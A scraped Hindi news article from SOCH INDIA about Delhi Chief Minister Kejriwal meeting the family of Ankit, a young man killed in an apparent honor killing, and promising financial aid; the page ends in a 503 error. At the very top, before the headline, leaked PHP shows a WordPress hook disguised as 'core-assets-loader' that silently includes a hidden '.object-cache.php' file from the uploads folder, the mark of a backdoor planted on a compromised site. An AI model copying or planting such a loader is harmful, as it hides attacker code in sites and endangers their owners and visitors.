add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); केजरीवाल ने की अंकित के परिवार से मुलाकात, दिया आर्थिक मदद का आश्वासन – SOCH INDIA
Menu

अपराध समाचार
केजरीवाल ने की अंकित के परिवार से मुलाकात, दिया आर्थिक मदद का आश्वासन

nobanner

सरेआम दिल्ली की सड़क पर कत्ल कर दिए गए अंकित के परिवार ने मुख्यमंत्री अरविंद केजरीवाल से मुलाकात की. केजरीवाल ने उन्हें 5 लाख की आर्थिक सहयता का आश्वासन दिया लेकिन परिवार इस सहायता से नाखुश दिखा. परिवार के लोगों ने कहा कि घर में अंकित के अलावा कमाने वाला कोई नहीं था और यह राशि काफी कम है.

इससे पहले भी सीएम केजरीवाल ने अंकित के परिवार के सदस्यों के साथ भेंट की थी और इस भयावह घटना पर दुख प्रकट किया. मुख्यमंत्री ने अपराधियों को सजा दिलाने के लिए सभी कानूनी सहायता उपलब्ध कराने और अंकित की मां का इलाज अच्छे से कराने का वादा किया.

ट्वीट भी किया था केजरीवाल ने
केजरीवाल ने ट्वीट कर अंकित को इंसाफ दिलाने की बात भी कही थी. उन्होंने कहा था कि “अंकित के पिताजी से बात की. जो हुआ उसकी जितनी निंदा करें उतना कम है. अंकित को न्याय दिलाने के लिए दिल्ली सरकार बड़े से बड़ा वकील खड़ा करेगी. हम हर सम्भव कोशिश करेंगे कि दोषियों को सख्त से सख्त सज़ा हो. भगवान अंकित के परिवार को शक्ति दे. इस संघर्ष में हम उनके साथ हैं.”

दिल्ली सरकार की योजना
इससे पहले दिल्ली के उपमुख्यमंत्री मनीष सिसोदिया ने कहा कि ऑनर किलिंग के नाम पर हत्याएं बहुत परेशान करनी वाली हैं. कला और संस्कृति विभाग के सचिव को भेजे गए पत्र में सिसोदिया ने अधिकारियों को जल्द से जल्द यह संदेश फैलाने के लिए एक ऐसी योजना लाने के लिए कहा है जिसके जरिए लोगों को यह बताया जा सके कि प्यार में पड़े लोगों की हत्या एक पाप है.

ये है मामला
दिल्ली के ख्याला इलाके में 23 साल के अंकित का बीच सड़क पर कत्ल कर दिया गया. अंकित दूसरे धर्म की लड़की से प्यार करता था और लड़की के परिवार वालों ने ही हत्या की इस वारदात को अंजाम दिया है. पुलिस ने बताया कि 4 लोगों ने चाकुओं से युवक पर हमला किया जिनमें से एक को लोगों ने भागते वक्त पकड़ लिया. तीन लोग फरार होने में कामयाब हो गए. लड़की ने अपने बयान में कहा है कि वह लड़के से प्यार करती थी. अंकित रघुबीर नगर में रहता था और रात को आठ बजे स्कूटी से कहीं जाने के लिए निकला था. तभी 4 लोगों ने उस पर हमला कर दिया और उसका गला काट दिया. उसे तत्काल अस्पताल ले जाया गया लेकिन अधिक खून बह जाने के कारण उसकी मौत हो गई.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.